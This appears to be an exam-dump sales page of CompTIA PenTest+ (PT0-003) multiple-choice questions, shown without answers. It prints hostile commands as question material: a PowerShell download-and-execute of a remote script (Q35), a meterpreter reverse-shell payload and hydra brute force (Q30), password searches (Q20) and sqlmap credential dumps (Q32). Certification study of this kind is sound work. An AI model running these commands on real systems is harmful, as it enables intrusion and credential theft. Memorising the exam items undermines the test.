New Year Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: cramtick70

PT0-003 CompTIA PenTest+ Exam Questions and Answers

Questions 4

A penetration tester is working on a security assessment of a mobile application that was developed in-house for local use by a hospital. The hospital and its customers are very concerned about disclosure of information. Which of the following tasks should the penetration tester do first?

Options:

A.

Set up Drozer in order to manipulate and scan the application.

B.

Run the application through the mobile application security framework.

C.

Connect Frida to analyze the application at runtime to look for data leaks.

D.

Load the application on client-owned devices for testing.

Buy Now
Questions 5

During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network's authentication mechanism to gain unauthorized access to the network. Which of the following attacks would the tester most likely perform to gain access?

Options:

A.

KARMA attack

B.

Beacon flooding

C.

MAC address spoofing

D.

Eavesdropping

Buy Now
Questions 6

A penetration tester is conducting reconnaissance on a target network. The tester runs the following Nmap command: nmap -sv -sT -p - 192.168.1.0/24. Which of the following describes the most likely purpose of this scan?

Options:

A.

OS fingerprinting

B.

Attack path mapping

C.

Service discovery

D.

User enumeration

Buy Now
Questions 7

SIMULATION

Using the output, identify potential attack vectors that should be further investigated.

Options:

Buy Now
Questions 8

During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine. Which of the following tools should the penetration tester use to continue the attack?

Options:

A.

Responder

B.

Hydra

C.

BloodHound

D.

CrackMapExec

Buy Now
Questions 9

A penetration tester is conducting a vulnerability scan. The tester wants to see any vulnerabilities that may be visible from outside of the organization. Which of the following scans should the penetration tester perform?

Options:

A.

SAST

B.

Sidecar

C.

Unauthenticated

D.

Host-based

Buy Now
Questions 10

During an assessment, a penetration tester runs the following command:

setspn.exe -Q /

Which of the following attacks is the penetration tester preparing for?

Options:

A.

LDAP injection

B.

Pass-the-hash

C.

Kerberoasting

D.

Dictionary

Buy Now
Questions 11

A penetration tester wants to create a malicious QR code to assist with a physical security assessment. Which of the following tools has the built-in functionality most likely needed for this task?

Options:

A.

BeEF

B.

John the Ripper

C.

ZAP

D.

Evilginx

Buy Now
Questions 12

In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization. Through which of the following features could this information have been accessed?

Options:

A.

IAM

B.

Block storage

C.

Virtual private cloud

D.

Metadata services

Buy Now
Questions 13

A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement. Which of the following should the tester do first when developing the phishing campaign?

Options:

A.

Shoulder surfing

B.

Recon-ng

C.

Social media

D.

Password dumps

Buy Now
Questions 14

A penetration tester assesses an application allow list and has limited command-line access on the Windows system. Which of the following would give the penetration tester information that could aid in continuing the test?

Options:

A.

mmc.exe

B.

icacls.exe

C.

nltest.exe

D.

rundll.exe

Buy Now
Questions 15

A penetration tester is performing network reconnaissance. The tester wants to gather information about the network without causing detection mechanisms to flag the reconnaissance activities. Which of the following techniques should the tester use?

Options:

A.

Sniffing

B.

Banner grabbing

C.

TCP/UDP scanning

D.

Ping sweeps

Buy Now
Questions 16

A penetration tester gains access to a host but does not have access to any type of shell. Which of the following is the best way for the tester to further enumerate the host and the environment in which it resides?

Options:

A.

ProxyChains

B.

Netcat

C.

PowerShell ISE

D.

Process IDs

Buy Now
Questions 17

A penetration tester is getting ready to conduct a vulnerability scan as part of the testing process. The tester will evaluate an environment that consists of a container orchestration cluster. Which of the following tools should the tester use to evaluate the cluster?

Options:

A.

Trivy

B.

Nessus

C.

Grype

D.

Kube-hunter

Buy Now
Questions 18

A penetration tester executes multiple enumeration commands to find a path to escalate privileges. Given the following command:

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Which of the following is the penetration tester attempting to enumerate?

Options:

A.

Attack path mapping

B.

API keys

C.

Passwords

D.

Permission

Buy Now
Questions 19

During a penetration test, the tester uses a vulnerability scanner to collect information about any possible vulnerabilities that could be used to compromise the network. The tester receives the results and then executes the following command:

snmpwalk -v 2c -c public 192.168.1.23

Which of the following is the tester trying to do based on the command they used?

Options:

A.

Bypass defensive systems to collect more information.

B.

Use an automation tool to perform the attacks.

C.

Script exploits to gain access to the systems and host.

D.

Validate the results and remove false positives.

Buy Now
Questions 20

During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:

findstr /SIM /C:"pass" *.txt *.cfg *.xml

Which of the following is the penetration tester trying to enumerate?

Options:

A.

Configuration files

B.

Permissions

C.

Virtual hosts

D.

Secrets

Buy Now
Questions 21

Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

Options:

A.

Badge cloning

B.

Shoulder surfing

C.

Tailgating

D.

Site survey

Buy Now
Questions 22

During the reconnaissance phase, a penetration tester collected the following information from the DNS records:

A-----> www

A-----> host

TXT --> vpn.comptia.org

SPF---> ip =2.2.2.2

Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?

Options:

A.

MX

B.

SOA

C.

DMARC

D.

CNAME

Buy Now
Questions 23

A penetration tester downloads a JAR file that is used in an organization's production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester's activities?

Options:

A.

SAST

B.

SBOM

C.

ICS

D.

SCA

Buy Now
Questions 24

A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?

Host | CVSS | EPSS

Target 1 | 4 | 0.6

Target 2 | 2 | 0.3

Target 3 | 1 | 0.6

Target 4 | 4.5 | 0.4

Options:

A.

Target 1: CVSS Score = 4 and EPSS Score = 0.6

B.

Target 2: CVSS Score = 2 and EPSS Score = 0.3

C.

Target 3: CVSS Score = 1 and EPSS Score = 0.6

D.

Target 4: CVSS Score = 4.5 and EPSS Score = 0.4

Buy Now
Questions 25

A previous penetration test report identified a host with vulnerabilities that was

successfully exploited. Management has requested that an internal member of the

security team reassess the host to determine if the vulnerability still exists.

Part 1:

. Analyze the output and select the command to exploit the vulnerable service.

Part 2:

. Analyze the output from each command.

· Select the appropriate set of commands to escalate privileges.

· Identify which remediation steps should be taken.

Options:

Buy Now
Questions 26

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Options:

Buy Now
Questions 27

A tester is performing an external phishing assessment on the top executives at a company. Two-factor authentication is enabled on the executives’ accounts that are in the scope of work. Which of the following should the tester do to get access to these accounts?

Options:

A.

Configure an external domain using a typosquatting technique. Configure Evilginx to bypass two-factor authentication using a phishlet that simulates the mail portal for the company.

B.

Configure Gophish to use an external domain. Clone the email portal web page from the company and get the two-factor authentication code using a brute-force attack method.

C.

Configure an external domain using a typosquatting technique. Configure SET to bypass two-factor authentication using a phishlet that mimics the mail portal for the company.

D.

Configure Gophish to use an external domain. Clone the email portal web page from the company and get the two-factor authentication code using a vishing method.

Buy Now
Questions 28

During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software. Which of the following host-based attacks should the tester use?

Options:

A.

On-path

B.

Logic bomb

C.

Rootkit

D.

Buffer overflow

Buy Now
Questions 29

During an engagement, a penetration tester found some weaknesses that were common across the customer’s entire environment. The weaknesses included the following:

    Weaker password settings than the company standard

    Systems without the company's endpoint security software installed

    Operating systems that were not updated by the patch management system

Which of the following recommendations should the penetration tester provide to address the root issue?

Options:

A.

Add all systems to the vulnerability management system.

B.

Implement a configuration management system.

C.

Deploy an endpoint detection and response system.

D.

Patch the out-of-date operating systems.

Buy Now
Questions 30

A penetration tester enumerates a legacy Windows host on the same subnet. The tester needs to select exploit methods that will have the least impact on the host's operating stability. Which of the following commands should the tester try first?

Options:

A.

responder -I eth0 john responder_output.txt

B.

hydra -L administrator -P /path/to/pwlist.txt -t 100 rdp://

C.

msf > use msf > set msf > set PAYLOAD windows/meterpreter/reverse_tcp msf > run

D.

python3 ./buffer_overflow_with_shellcode.py 445

Buy Now
Questions 31

Which of the following OT protocols sends information in cleartext?

Options:

A.

TTEthernet

B.

DNP3

C.

Modbus

D.

PROFINET

Buy Now
Questions 32

During an assessment, a penetration tester exploits an SQLi vulnerability. Which of the following commands would allow the penetration tester to enumerate password hashes?

Options:

A.

sqlmap -u www.example.com/?id=1 --search -T user

B.

sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred

C.

sqlmap -u www.example.com/?id=1 --tables -D accounts

D.

sqlmap -u www.example.com/?id=1 --schema --current-user --current-db

Buy Now
Questions 33

A penetration tester performs an assessment on the target company's Kubernetes cluster using kube-hunter. Which of the following types of vulnerabilities could be detected with the tool?

Options:

A.

Network configuration errors in Kubernetes services

B.

Weaknesses and misconfigurations in the Kubernetes cluster

C.

Application deployment issues in Kubernetes

D.

Security vulnerabilities specific to Docker containers

Buy Now
Questions 34

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Questions 35

Given the following script:

$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1]

If ($1 -eq "administrator") {

echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1 ') | powershell -noprofile -}

Which of the following is the penetration tester most likely trying to do?

Options:

A.

Change the system's wallpaper based on the current user's preferences.

B.

Capture the administrator's password and transmit it to a remote server.

C.

Conditionally stage and execute a remote script.

D.

Log the internet browsing history for a systems administrator.

Buy Now
Questions 36

A penetration tester wants to use the following Bash script to identify active servers on a network:

1 network_addr="192.168.1"

2 for h in {1..254}; do

3 ping -c 1 -W 1 $network_addr.$h > /dev/null

4 if [ $? -eq 0 ]; then

5 echo "Host $h is up"

6 else

7 echo "Host $h is down"

8 fi

9 done

Which of the following should the tester do to modify the script?

Options:

A.

Change the condition on line 4.

B.

Add 2>&1 at the end of line 3.

C.

Use seq on the loop on line 2.

D.

Replace $h with ${h} on line 3.

Buy Now
Questions 37

A penetration tester creates a list of target domains that require further enumeration. The tester writes the following script to perform vulnerability scanning across the domains:

line 1: #!/usr/bin/bash

line 2: DOMAINS_LIST = "/path/to/list.txt"

line 3: while read -r i; do

line 4: nikto -h $i -o scan-$i.txt &

line 5: done

The script does not work as intended. Which of the following should the tester do to fix the script?

Options:

A.

Change line 2 to {"domain1", "domain2", "domain3", }.

B.

Change line 3 to while true; read -r i; do.

C.

Change line 4 to nikto $i | tee scan-$i.txt.

D.

Change line 5 to done < "$DOMAINS_LIST".

Buy Now
Questions 38

A penetration tester wants to use multiple TTPs to assess the reactions (alerted, blocked, and others) by the client’s current security tools. The threat-modeling team indicates the TTPs in the list might affect their internal systems and servers. Which of the following actions would the tester most likely take?

Options:

A.

Use a BAS tool to test multiple TTPs based on the input from the threat-modeling team.

B.

Perform an internal vulnerability assessment with credentials to review the internal attack surface.

C.

Use a generic vulnerability scanner to test the TTPs and review the results with the threat-modeling team.

D.

Perform a full internal penetration test to review all the possible exploits that could affect the systems.

Buy Now
Questions 39

As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands. Which of the following techniques would the penetration tester most likely use to access the sensitive data?

Options:

A.

Logic bomb

B.

SQL injection

C.

Brute-force attack

D.

Cross-site scripting

Buy Now
Exam Code: PT0-003
Exam Name: CompTIA PenTest+ Exam
Last Update: Dec 26, 2024
Questions: 131
PT0-003 pdf

PT0-003 PDF

$25.5  $84.99
PT0-003 Engine

PT0-003 Testing Engine

$30  $99.99
PT0-003 PDF + Engine

PT0-003 PDF + Testing Engine

$40.5  $134.99